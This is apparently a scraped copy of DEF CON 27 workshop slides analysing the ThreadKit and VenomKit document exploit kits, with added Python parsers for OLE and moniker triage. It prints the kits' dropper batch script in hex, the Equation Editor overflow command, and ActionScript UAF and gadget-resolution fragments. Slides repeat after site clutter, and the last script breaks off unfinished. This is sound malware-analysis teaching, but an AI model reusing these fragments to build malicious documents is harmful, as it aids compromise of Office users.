2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
FROM EK TO DEK: ANALYZING
DOCUMENT EXPLOIT KITS
JOSHUA REYNOLDS, SENIOR SECURITY RESEARCHER
DOCUMENT EXPLOIT KITS
§ Traditional Exploit Kits such as RIG and Angler fingerprint browsers and deploy multiple exploits for browsers and plugins
§ Document Exploit Kits deploy multiple exploits for Microsoft Office, DCOM servers and ActiveX controls (e.g. Adobe Flash) in a single document
THREADKIT AND VENOMKIT
§ Two prominent Document Exploit Kit families
§ Embed multiple exploits into a single RTF document
§ Multiple infection chains upon successful exploitation
§ Use of whitelist bypasses and other common Red Team/Pentest techniques
§ Used for distribution of FormBook, AZORult, LokiBot, and Netwire
§ Targeted campaigns by COBALT SPIDER
THREADKIT CAMPAIGN EXAMPLE
§ Spear-phishing campaign conducted by COBALT SPIDER
§ Posing as European Central Bank
§ ThreadKit document dropping COBINT
EXPLOITS
§ Multiple exploit attempts are possible due to load ordering
§ Microsoft Office Moniker Logic Bug Exploits
    § CVE-2017-0199
    § CVE-2017-8570
§ Equation Editor Buffer Overflow Exploits
    § CVE-2017-11882
    § CVE-2018-0802
§ Adobe Flash Use After Free Exploit
    § CVE-2018-4878
THREADKIT INFECTION CHAIN EXAMPLE
[Infection chain diagram; node labels recovered from the slide: ThreadKit.rtf, CVE-2018-4878, CVE-2018-0802, Decoy.doc, Update.sct, CVE-2017-8570, Task.bat, CVE-2017-11882, SaVer.scr]
VENOMKIT INFECTION CHAIN EXAMPLE
[Infection chain diagram; node labels recovered from the slide: VenomKit.rtf, Decoy.doc, AnTleHN.sct, CVE-2017-8570, aaaaaaaa.txt, CVE-2017-11882, Payload.exe, cmstp.exe]
RTF OVERVIEW
§ Microsoft proprietary plaintext document format
§ Supports embedded content
    § Object Linking and Embedding (OLE) objects
    § Pictures
    § Fonts
    § Annotations
    § Drawing Objects
§ Uses control words, control symbols and groups to define formatting and embedded objects
§ Destination control words for embedded OLE objects
RTF OVERVIEW
{\object\objhtml\v
{\objdata
0105000002000000080000005061636b616765000000000000000000310
1000002007461736b2e62617400433a5c496e74656c5c7461736b2e6261
74000000030012000000433a5c496e74656c5c7461736b2-snip-
}
}
Objdata destination control word
Hex encoded OLE object
OLE OVERVIEW
§ Create documents (container application) that contain or externally reference data for another application (creating application)
    § Embedded Objects – contain stored application data
    § Linked Objects – reference external application data in another application
§ The creating application is identified using an OLE class name or CLSID
§ Widely supported by applications, including DCOM servers and Adobe Flash
00000000: 0105 0000 0200 0000 0800 0000 5061 636b ............Pack
00000010: 6167 6500 0000 0000 0000 0000 3101 0000 age.........1...
00000020: 0200 7461 736b 2e62 6174 0043 3a5c 496e ..task.bat.C:\In
00000030: 7465 6c5c 7461 736b 2e62 6174 0000 0003 tel\task.bat....
00000040: 0012 0000 0043 3a5c 496e 7465 6c5c 7461 .....C:\Intel\ta
00000050: 736b 2e62 6174 0096 0000 0045 4348 4f20 sk.bat.....ECHO 
00000060: 4f46 460d 0a73 6574 2074 703d 2225 7465 OFF..set tp="%te
00000070: 6d70 255c 626c 6f63 6b2e 7478 7422 0d0a mp%\block.txt"..
00000080: 4946 2045 5849 5354 2025 7470 2520 2865 IF EXIST %tp% (e
00000090: 7869 7429 2045 4c53 4520 2873 6574 2074 xit) ELSE (set t
000000a0: 703d 2225 7465 6d70 255c 626c 6f63 6b2e p="%temp%\block.
000000b0: 7478 7422 2026 2063 6f70 7920 4e55 4c20 txt" & copy NUL 
000000c0: 2574 7025 2026 2073 7461 7274 202f 6220 %tp% & start /b 
000000d0: 2574 656d 7025 5c32 6e64 2e62 6174 290d %temp%\2nd.bat).
000000e0: 0a64 656c 2022 257e 6630 220d 0a65 7869 .del "%~f0"..exi
000000f0: 7411 0000 0043 003a 005c 0049 006e 0074 t....C.:.\.I.n.t
00000100: 0065 006c 005c 0074 0061 0073 006b 002e .e.l.\.t.a.s.k..
00000110: 0062 0061 0074 0008 0000 0074 0061 0073 .b.a.t.....t.a.s
00000120: 006b 002e 0062 0061 0074 0011 0000 0043 .k...b.a.t.....C
00000130: 003a 005c 0049 006e 0074 0065 006c 005c .:.\.I.n.t.e.l.\
00000140: 0074 0061 0073 006b 002e 0062 0061 0074 .t.a.s.k...b.a.t
00000150: 0001 0500 0000 0000 00 .........
OLEVersion
FormatID (0x00000002 denotes an EmbeddedObject)
ClassName with prefixed length (Package class object)
NativeDataSize (size of embedded object data)
NativeData (object raw data, in this case a .bat script)
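As an added example (not part of the workshop materials), the following Python walks an RTF \objdata payload the way an analyst does during triage: decode the hex, parse the OLE1 header fields annotated above, and for a Package class object recover the label, the path the file is written to, and the embedded file itself. The sample object is constructed inside the block with a harmless batch body; the function and field names are my own, not an existing tool's API.

```python
import struct

# OLE1 object header (MS-OLEDS): OLEVersion, FormatID, then length-prefixed ClassName,
# TopicName and ItemName; an embedded object (FormatID 2) is followed by NativeDataSize
# and NativeData. For class "Package" the NativeData is an OLE Packager record.
FORMATID_EMBEDDED = 0x00000002


def objdata_to_bytes(objdata_text):
    """Decode the hex inside an RTF \\objdata destination. Pass only the destination's
    content: every hex digit (including stray ones) is consumed, whitespace is ignored."""
    digits = "".join(ch for ch in objdata_text if ch in "0123456789abcdefABCDEF")
    return bytes.fromhex(digits[: len(digits) // 2 * 2])


def _read_lpstr(buf, off):
    """Length-prefixed ANSI string: u32 length that includes the terminating NUL."""
    (n,) = struct.unpack_from("<I", buf, off)
    raw = buf[off + 4 : off + 4 + n]
    return raw.rstrip(b"\x00").decode("latin-1"), off + 4 + n


def _read_cstr(buf, off):
    """NUL-terminated ANSI string."""
    end = buf.index(b"\x00", off)
    return buf[off:end].decode("latin-1"), end + 1


def parse_ole1(blob):
    """Parse the OLE1 header; returns its fields and, for embedded objects, NativeData."""
    ole_version, format_id = struct.unpack_from("<II", blob, 0)
    off = 8
    class_name, off = _read_lpstr(blob, off)
    topic_name, off = _read_lpstr(blob, off)
    item_name, off = _read_lpstr(blob, off)
    obj = {"ole_version": ole_version, "format_id": format_id, "class_name": class_name,
           "topic_name": topic_name, "item_name": item_name, "native_data": None}
    if format_id == FORMATID_EMBEDDED:
        (size,) = struct.unpack_from("<I", blob, off)
        native = blob[off + 4 : off + 4 + size]
        if len(native) != size:
            raise ValueError("NativeData truncated: declared %d, have %d" % (size, len(native)))
        obj["native_data"] = native
    return obj


def parse_package(native):
    """Packager record: u16 header, label, original path, u32 type, length-prefixed
    path the object is dropped to, u32 size, file contents (Unicode copies may follow)."""
    (header,) = struct.unpack_from("<H", native, 0)
    label, off = _read_cstr(native, 2)
    original_path, off = _read_cstr(native, off)
    (pkg_type,) = struct.unpack_from("<I", native, off)
    drop_path, off = _read_lpstr(native, off + 4)
    (size,) = struct.unpack_from("<I", native, off)
    data = native[off + 4 : off + 4 + size]
    return {"header": header, "label": label, "original_path": original_path,
            "type": pkg_type, "drop_path": drop_path, "data": data}


def triage_objdata(objdata_text):
    """Summarise one \\objdata object: class name plus, for Package objects, which file
    would be written to disk when the document is opened and what it contains."""
    obj = parse_ole1(objdata_to_bytes(objdata_text))
    result = {"class_name": obj["class_name"], "format_id": obj["format_id"], "package": None}
    if obj["class_name"] == "Package" and obj["native_data"] is not None:
        result["package"] = parse_package(obj["native_data"])
    return result


def _lpstr(text):
    raw = text.encode("latin-1") + b"\x00"
    return struct.pack("<I", len(raw)) + raw


def build_sample_objdata():
    """Constructed sample with the field layout of the dump above (harmless batch body,
    not the kit's own data), returned as the hex text an \\objdata destination carries."""
    script = b"ECHO OFF\r\nECHO constructed sample\r\n"
    native = (struct.pack("<H", 2) + b"task.bat\x00" + b"C:\\Intel\\task.bat\x00"
              + struct.pack("<I", 0x00030000) + _lpstr("C:\\Intel\\task.bat")
              + struct.pack("<I", len(script)) + script)
    ole1 = (struct.pack("<II", 0x00000501, FORMATID_EMBEDDED) + _lpstr("Package")
            + struct.pack("<II", 0, 0) + struct.pack("<I", len(native)) + native)
    return ole1.hex()


if __name__ == "__main__":
    summary = triage_objdata(build_sample_objdata())
    print(summary["class_name"], summary["package"]["label"], summary["package"]["drop_path"])
    print(summary["package"]["data"].decode())
```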
COMPOUND MONIKER LOGIC EXPLOIT
§ CVE-2017-8570 is a logic vulnerability in Microsoft Office
§ Allows execution of a local scriptlet file using a StdOleLink class object
§ The scriptlet is a Package object written to %TEMP% when the document is opened
§ Composite moniker
    § File Moniker references the scriptlet
    § New Moniker
§ Placing logic exploits first in the load order means no crash, so the remaining exploit objects are still loaded
COMPOSITE MONIKER OLE OBJECT
00000000 01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 ................
00000010 00 00 00 00 00 00 00 00 C0 00 00 00 09 03 00 00 ................
00000020 00 00 00 00 C0 00 00 00 00 00 00 46 02 00 00 00 ...........F....
00000030 03 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
00000040 00 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060 0E 00 AD DE 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000070 00 00 00 00 00 00 00 00 38 00 00 00 32 00 00 00 ........8...2...
00000080 03 00 25 00 74 00 4D 00 70 00 25 00 5C 00 69 00 ..%.t.M.p.%.\.i.
00000090 6E 00 74 00 65 00 6C 00 64 00 72 00 69 00 76 00 n.t.e.l.d.r.i.v.
000000A0 65 00 72 00 75 00 70 00 64 00 31 00 2E 00 73 00 e.r.u.p.d.1...s.
000000B0 63 00 74 00 C6 AF AB EC 19 7F D2 11 97 8E 00 00 c.t.............
000000C0 F8 75 7E 2A 00 00 00 00 00 00 00 00 00 00 00 00 .u~*............
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF ................
000000E0 06 09 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
000000F0 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 ................
CLSID identifying composite moniker
CLSID identifying file moniker
CLSID identifying new moniker
Path to scriptlet to execute
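The following Python is an added example, not code from the workshop: it parses the OLEStream laid out above, walks the composite moniker to recover each CLSID and the FileMoniker path, and flags the CompositeMoniker + FileMoniker + NewMoniker combination the slides associate with CVE-2017-8570, so an analyst knows which dropped file to retrieve. The sample stream is constructed inside the block with a placeholder path; the function names are my own.

```python
import struct
import uuid

# CLSIDs (registry form) of the moniker types that appear in the dump above.
CLSID_COMPOSITE_MONIKER = "00000309-0000-0000-C000-000000000046"
CLSID_FILE_MONIKER = "00000303-0000-0000-C000-000000000046"
CLSID_NEW_MONIKER = "ECABAFC6-7F19-11D2-978E-0000F8757E2A"


def clsid_str(raw16):
    """Render a CLSID stored on disk (little-endian first three fields) in registry form."""
    return str(uuid.UUID(bytes_le=bytes(raw16))).upper()


def parse_file_moniker(body):
    """FileMoniker body (MS-OLEDS): returns (path, bytes consumed). The ANSI path may be
    empty padding, in which case the real path lives in the optional Unicode part."""
    _c_anti, ansi_len = struct.unpack_from("<HI", body, 0)
    off = 6
    ansi_path = body[off:off + ansi_len].rstrip(b"\x00").decode("latin-1")
    off += ansi_len
    _end_server, version = struct.unpack_from("<HH", body, off)
    off += 4
    if version != 0xDEAD:
        raise ValueError("FileMoniker versionNumber 0x%04X, expected 0xDEAD" % version)
    off += 20  # reserved bytes
    (uni_size,) = struct.unpack_from("<I", body, off)
    off += 4
    if uni_size == 0:
        return ansi_path, off
    uni_bytes, _key = struct.unpack_from("<IH", body, off)
    off += 6
    uni_path = body[off:off + uni_bytes].decode("utf-16-le")
    return uni_path or ansi_path, off + uni_bytes


def parse_moniker_stream(data):
    """Walk one MonikerStream (CLSID + body), descending into composite monikers.
    Returns (list of (clsid, path or None), bytes consumed)."""
    clsid = clsid_str(data[:16])
    body = data[16:]
    if clsid == CLSID_COMPOSITE_MONIKER:
        (count,) = struct.unpack_from("<I", body, 0)
        off, found = 4, [(clsid, None)]
        for _ in range(count):
            items, used = parse_moniker_stream(body[off:])
            found.extend(items)
            off += used
        return found, 16 + off
    if clsid == CLSID_FILE_MONIKER:
        path, used = parse_file_moniker(body)
        return [(clsid, path)], 16 + used
    # NewMoniker carries no body of interest; an unrecognised type has an unknown body
    # length, so the rest of the stream is attributed to it and parsing stops there.
    return [(clsid, None)], len(data)


def parse_ole_stream(stream):
    """The '\\x01Ole' stream: header, then reserved, relative and absolute moniker streams."""
    version, flags, _update, _reserved1 = struct.unpack_from("<IIII", stream, 0)
    off = 16
    (reserved_size,) = struct.unpack_from("<I", stream, off)
    off += 4 + reserved_size
    (relative_size,) = struct.unpack_from("<I", stream, off)
    off += 4 + relative_size
    (absolute_size,) = struct.unpack_from("<I", stream, off)
    off += 4
    monikers = parse_moniker_stream(stream[off:off + absolute_size])[0] if absolute_size else []
    return {"version": version, "linked": bool(flags & 1), "monikers": monikers}


def assess_ole_stream(stream):
    """Flag the composite-of-FileMoniker-and-NewMoniker layout shown above and report
    the path the FileMoniker points at."""
    info = parse_ole_stream(stream)
    clsids = [c for c, _ in info["monikers"]]
    paths = [p for _, p in info["monikers"] if p]
    suspicious = {CLSID_COMPOSITE_MONIKER, CLSID_FILE_MONIKER, CLSID_NEW_MONIKER} <= set(clsids)
    return {"suspicious": suspicious, "clsids": clsids, "paths": paths, "linked": info["linked"]}


def build_sample_ole_stream(path="%TEMP%\\sample.sct", composite=True):
    """Constructed OLEStream with the moniker layout of the dump (placeholder path, not the
    kit's); composite=False gives a plain linked object holding only a FileMoniker."""
    uni = path.encode("utf-16-le")
    file_moniker = (uuid.UUID(CLSID_FILE_MONIKER).bytes_le + struct.pack("<HI", 0, 1) + b"\x00"
                    + struct.pack("<HH", 0, 0xDEAD) + b"\x00" * 20
                    + struct.pack("<IIH", len(uni) + 6, len(uni), 3) + uni)
    if composite:
        abs_moniker = (uuid.UUID(CLSID_COMPOSITE_MONIKER).bytes_le + struct.pack("<I", 2)
                       + file_moniker + uuid.UUID(CLSID_NEW_MONIKER).bytes_le)
    else:
        abs_moniker = file_moniker
    return (struct.pack("<IIII", 0x02000001, 0x00000009, 1, 0) + struct.pack("<II", 0, 0)
            + struct.pack("<I", len(abs_moniker)) + abs_moniker)


if __name__ == "__main__":
    print(assess_ole_stream(build_sample_ole_stream()))
    print(assess_ole_stream(build_sample_ole_stream(composite=False)))
```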
STATICALLY ANALYZE THREADKIT COMPOSITE MONIKER EXPLOIT INFECTION CHAIN
Hands-On Exercise
EQUATION EDITOR BUFFER OVERFLOW EXPLOITS
§ CVE-2017-11882 and CVE-2018-0802
§ Creating Application is Microsoft Equation Editor (EQNEDT32.EXE)
§ Launched by the DCOM Server Process Launcher as a Distributed Object Linking and Embedding (DCOM) server
§ Microsoft Word acts as the client and sends binary equation messages to the server for processing
§ DCOM server crashes do not affect the loading of the remaining exploits
FONT RECORD BUFFER OVERFLOW
§ CVE-2017-11882
§ Unprotected strcpy into a stack buffer with user-controlled data
§ MTEF Font record
§ No DEP, ASLR or stack cookies, so the result is a vanilla buffer overflow
§ The return address is overwritten with a call to WinExec, with the supplied Font name string as its argument, to execute the Package object from %TEMP%
FONT RECORD BUFFER OVERFLOW
00000ca0: 0000 0800 0043 6d44 202f 6320 436d 4420 .....CmD /c CmD
00000cb0: 3c20 2225 746d 5025 5c61 6161 6161 6161 < "%tmP%\aaaaaaa
00000cc0: 6161 612e 7478 7422 2026 2065 7869 7420 aaa.txt" & exit
00000cd0: 2012 0c63 0044 0002 8165 0002 8166 0000 ..c.D...e...f..
Font record Name field
WinExec Return Address
DYNAMICALLY ANALYZE EQNEDT32.EXE EXPLOITATION INFECTION CHAIN
Hands-On Exercise
STATICALLY ANALYZE EQNEDT32.EXE TO IDENTIFY CVE-2017-11882
Hands-On Exercise
DYNAMICALLY ANALYZE EQNEDT32.EXE CVE-2017-11882 EXPLOITATION
Hands-On Exercise
ADOBE FLASH UAF
§ CVE-2018-4878
§ The Flash embedded OLE CLSID causes the ActiveX control DLL to be loaded into Word
§ The DLL processes the embedded Shockwave Flash (SWF) object
§ No sandboxing (unlike in a browser environment)
§ The Use After Free may crash Word, but it is the last exploit to be attempted
STATICALLY ANALYZE ACTIONSCRIPT TO IDENTIFY UAF TRIGGER
Hands-On Exercise
ADOBE FLASH UAF – UAF TRIGGER
public function MainExp()
{
    this.shellcodBytes = MainExp_shellcodBytes;
    super();
    data14 = new this.shellcodBytes() as ByteArray;
    data14.endian = Endian.LITTLE_ENDIAN;
    setTimeout(this.startexp,10);
}
public function startexp() : void
{
    this.var_3 = new UAFGenerator(this);
}
ADOBE FLASH UAF – UAF TRIGGER
public function UAFGenerator(param1:MainExp)
{
    this.method_2();
    try
    {
        new LocalConnection().connect("foo");
        new LocalConnection().connect("foo");
    }
    catch(e:Error)
    {
        this.var_13 = new DRM_obj();
    }
    this.var_14 = new Timer(100,1000);
    this.var_14.addEventListener("timer",this.method_1);
    this.var_14.start();
}
ADOBE FLASH UAF - UAF TRIGGER
public function method_2() : void
{
    var _loc1_:PSDK = PSDK.pSDK;
    var _loc2_:PSDKEventDispatcher = _loc1_.createDispatcher();
    this.var_15 = _loc1_.createMediaPlayer(_loc2_);
    this.var_16 = new DRM_obj();
    this.var_15.drmManager.initialize(this.var_16);
    this.var_16 = null;
}
ADOBE FLASH UAF - UAF TRIGGER
public function method_1(param1:TimerEvent) : void
{
    if(this.var_13.a1 != 4369)
    {
        this.var_14.stop();
        this.flash25();
    }
}
ADOBE FLASH UAF – DLL MEMORY SEARCH
public static var flash72:Boolean = Capabilities.version.toUpperCase().search("WIN") >= 0;
while(var_12 < size)
{
    flash21.position = b + flash32(b0 + var_12);
    if(flash21.readUTFBytes(12).toLowerCase() == "kernel32.dll")
    {
        oft = flash32(b0 + var_12 - 3 * 4);
        ft = flash32(b0 + var_12 + 4);
        break;
    }
    var_12 = var_12 + 5 * 4;
}
ADOBE FLASH UAF – GADGET RESOLUTION
-snip-
if(flash21.readUTF().toLowerCase() == "virtualprotect")
{
    gadget3 = flash32(b + ft + var_12 * 4);
    c++;
    -snip-
else
{
    flash21.position = b + b0;
    if(flash21.readUTF().toLowerCase() == "createprocessa")
    {
        CreateProcessFunc = flash32(b + ft + var_12 * 4);
        c++;
        -snip-
STATICALLY ANALYZE ACTIONSCRIPT TO EXTRACT AND ANALYZE SHELLCODE
Hands-On Exercise
ADOBE FLASH UAF - SHELLCODE
§ Shellcode walks the InMemoryOrderModuleList
§ Hashes each module name to find kernel32.dll with the hash 0x6A4ABC5B
§ The export table of kernel32.dll is searched for two hex values in memory, 0x50746547 meaning "PteG" and 0x41636F72 meaning "Acor", i.e. GetProcA, which is the substring used to identify the GetProcAddress function
§ 0x636578 (meaning "cex") and 0x456E6957 (meaning "EniW"), i.e. WinExec
§ GetProcAddress is used to resolve the function address
§ WinExec is called to execute the following command:
    § cmd.exe /c %temp%\task.bat

 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
Wouter Lemaire
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
Zilliz
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 

Recently uploaded (20)

Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
 
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
 
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfAI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 

DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides

  • 9. RTF OVERVIEW
    § Microsoft proprietary plaintext document format
    § Supports embedded content
      § Object Linking and Embedding (OLE) objects
      § Pictures
      § Fonts
      § Annotations
      § Drawing Objects
    § Use of control words, control symbols and groups to define format and embedded objects
    § Destination control words for embedded OLE objects
  • 10. RTF OVERVIEW
    {\object\objhtml\v{\objdata 0105000002000000080000005061636b616765000000000000000000310
    1000002007461736b2e62617400433a5c496e74656c5c7461736b2e6261
    74000000030012000000433a5c496e74656c5c7461736b2-snip- } }
    Annotated fields:
    § \objdata destination control word
    § Hex-encoded OLE object
  • 11. OLE OVERVIEW
    § Create documents (container application) to contain or externally reference data for another application (creating application)
      § Embedded Objects – Contain stored application data
      § Linked Objects – Reference external application data in another application
    § Creating Application is identified using OLE class names or CLSID
    § Widely supported applications, including DCOM servers and Adobe Flash
  • 12.
    00000000: 0105 0000 0200 0000 0800 0000 5061 636b  ............Pack
    00000010: 6167 6500 0000 0000 0000 0000 3101 0000  age.........1...
    00000020: 0200 7461 736b 2e62 6174 0043 3a5c 496e  ..task.bat.C:\In
    00000030: 7465 6c5c 7461 736b 2e62 6174 0000 0003  tel\task.bat....
    00000040: 0012 0000 0043 3a5c 496e 7465 6c5c 7461  .....C:\Intel\ta
    00000050: 736b 2e62 6174 0096 0000 0045 4348 4f20  sk.bat.....ECHO 
    00000060: 4f46 460d 0a73 6574 2074 703d 2225 7465  OFF..set tp="%te
    00000070: 6d70 255c 626c 6f63 6b2e 7478 7422 0d0a  mp%\block.txt"..
    00000080: 4946 2045 5849 5354 2025 7470 2520 2865  IF EXIST %tp% (e
    00000090: 7869 7429 2045 4c53 4520 2873 6574 2074  xit) ELSE (set t
    000000a0: 703d 2225 7465 6d70 255c 626c 6f63 6b2e  p="%temp%\block.
    000000b0: 7478 7422 2026 2063 6f70 7920 4e55 4c20  txt" & copy NUL 
    000000c0: 2574 7025 2026 2073 7461 7274 202f 6220  %tp% & start /b 
    000000d0: 2574 656d 7025 5c32 6e64 2e62 6174 290d  %temp%\2nd.bat).
    000000e0: 0a64 656c 2022 257e 6630 220d 0a65 7869  .del "%~f0"..exi
    000000f0: 7411 0000 0043 003a 005c 0049 006e 0074  t....C.:.\.I.n.t
    00000100: 0065 006c 005c 0074 0061 0073 006b 002e  .e.l.\.t.a.s.k..
    00000110: 0062 0061 0074 0008 0000 0074 0061 0073  .b.a.t.....t.a.s
    00000120: 006b 002e 0062 0061 0074 0011 0000 0043  .k...b.a.t.....C
    00000130: 003a 005c 0049 006e 0074 0065 006c 005c  .:.\.I.n.t.e.l.\
    00000140: 0074 0061 0073 006b 002e 0062 0061 0074  .t.a.s.k...b.a.t
    00000150: 0001 0500 0000 0000 00                   .........
    Annotated fields:
    § OLEVersion (offset 0x00)
    § FormatID (offset 0x04; 0x00000002 denotes an EmbeddedObject)
    § ClassName with prefixed length (offset 0x08; Package class object)
    § NativeDataSize (offset 0x20; size of embedded object data, here 0x131 bytes)
    § NativeData (from offset 0x24; object raw data, in this case a .bat script)
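The two slides above describe the layout of an embedded Package object by annotation only. The following script, an added example that is not code from the slides or from CrowdStrike, walks that layout in Python: it pulls the hex run out of an RTF \objdata destination, parses the OLE1 header (OLEVersion, FormatID, length-prefixed ClassName, NativeDataSize, NativeData) and then the Packager structure inside NativeData, recovering the file label, the drop path and the embedded file bytes. The RTF document it runs on is constructed inside the script with a harmless batch file in place of task.bat; the two WORDs that follow the original path are treated as opaque, as on slide 12, and the field names follow MS-OLEDS.

```python
"""Extract an OLE1 Package object from an RTF \\objdata destination and parse it.

Added example (not from the slides): the OLE1 wrapper follows the fields annotated
on slide 12, the Packager body inside NativeData follows MS-OLEDS. The RTF sample
is constructed in build_sample_rtf() with a benign batch file.
"""
import re
import struct


def extract_objdata_hex(rtf: str) -> bytes:
    """Decode the hex run that directly follows the first \\objdata control word.
    Kept simple on purpose: real droppers split, pad and obfuscate this run, which
    is why analysts normally reach for rtfobj (oletools) instead."""
    m = re.search(r"\\objdata\s*([0-9A-Fa-f\s]+)", rtf)
    if not m:
        raise ValueError("no \\objdata destination found")
    return bytes.fromhex(re.sub(r"\s+", "", m.group(1)))


def _nul_str(buf: bytes, off: int):
    """NUL-terminated ANSI string at off -> (text, offset after the NUL)."""
    end = buf.index(b"\x00", off)
    return buf[off:end].decode("latin-1"), end + 1


def _len_str(buf: bytes, off: int):
    """LengthPrefixedAnsiString: 4-byte LE length (NUL counted) then the bytes."""
    (n,) = struct.unpack_from("<I", buf, off)
    text = buf[off + 4:off + 4 + n].rstrip(b"\x00").decode("latin-1")
    return text, off + 4 + n


def parse_ole1_object(data: bytes) -> dict:
    """OLE1 ObjectHeader followed by the EmbeddedObject body."""
    ole_version, format_id = struct.unpack_from("<II", data, 0)
    if format_id != 0x00000002:                           # only EmbeddedObject handled here
        raise ValueError(f"FormatID {format_id:#010x} is not EmbeddedObject")
    class_name, off = _len_str(data, 8)
    topic_name, off = _len_str(data, off)
    item_name, off = _len_str(data, off)
    (native_size,) = struct.unpack_from("<I", data, off)
    native = data[off + 4:off + 4 + native_size]
    if len(native) != native_size:
        raise ValueError("NativeData is truncated")
    return {"ole_version": ole_version, "format_id": format_id, "class_name": class_name,
            "topic_name": topic_name, "item_name": item_name,
            "native_data_size": native_size, "native_data": native}


def parse_package(native: bytes) -> dict:
    """Packager payload: label, paths, embedded file bytes and the UTF-16 trailer."""
    (header,) = struct.unpack_from("<H", native, 0)       # 0x0002 on slide 12
    label, off = _nul_str(native, 2)                      # name shown to the user
    orig_path, off = _nul_str(native, off)                # path on the author's machine
    off += 4                                              # two WORDs: 00 00 03 00 on slide 12
    (plen,) = struct.unpack_from("<I", native, off)       # drop path length, NUL counted
    off += 4
    drop_path = native[off:off + plen].rstrip(b"\x00").decode("latin-1")
    off += plen
    (dlen,) = struct.unpack_from("<I", native, off)       # embedded file size (0x96 on slide 12)
    off += 4
    file_data = native[off:off + dlen]
    if len(file_data) != dlen:
        raise ValueError("embedded file is truncated")
    off += dlen
    unicode_strings = []                                   # three LE-length UTF-16 strings
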